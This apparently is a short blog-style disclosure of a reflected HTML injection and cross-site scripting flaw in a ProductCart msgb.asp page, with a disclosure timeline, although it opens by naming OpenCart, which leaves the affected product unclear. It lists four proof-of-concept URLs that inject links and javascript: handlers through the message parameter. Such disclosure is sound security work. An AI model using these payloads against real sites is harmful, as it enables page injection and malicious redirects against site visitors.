Older versions of OpenCart < v5 had a reflective Cross Site Scripting Vulnerability. I requested this CVE, but never published it because I got busy with other work. So I thought better late than never 🙂 Discovery Date: 04/28/2014 Vendor Notified: 04/30/2014 CVE Assigned: 05/01/2014 Update Released: 06/01/2014 For the ProductCart msgb.asp file, the message being passed as a query string is not fully sanitized, causing potential integrity issues with sites. This was tested on a licensed, fully updated and patched system. These POC's were completely successful in bypassing their sanitization rules:
https://attackdomain.com/store/pc/msgb.asp?message=HTML%20Injection%3C/a%3E
https://attackdomain.com/store/pc/msgb.asp?message=%3Ca%20href=%22http://www.google.com%22%3EBOOM!%3C/a%3E
https://attackdomain.com/store/pc/msgb.asp?message=%3Ca%20href=javascript:window.print();%3EJS%20Print%20Test%3C/a%3E
https://attackdomain.com/store/pc/msgb.asp?message=%3Ca href="" javascript:onmouseover="window.location.href=google.com;"%3E Test%3C/a%3E
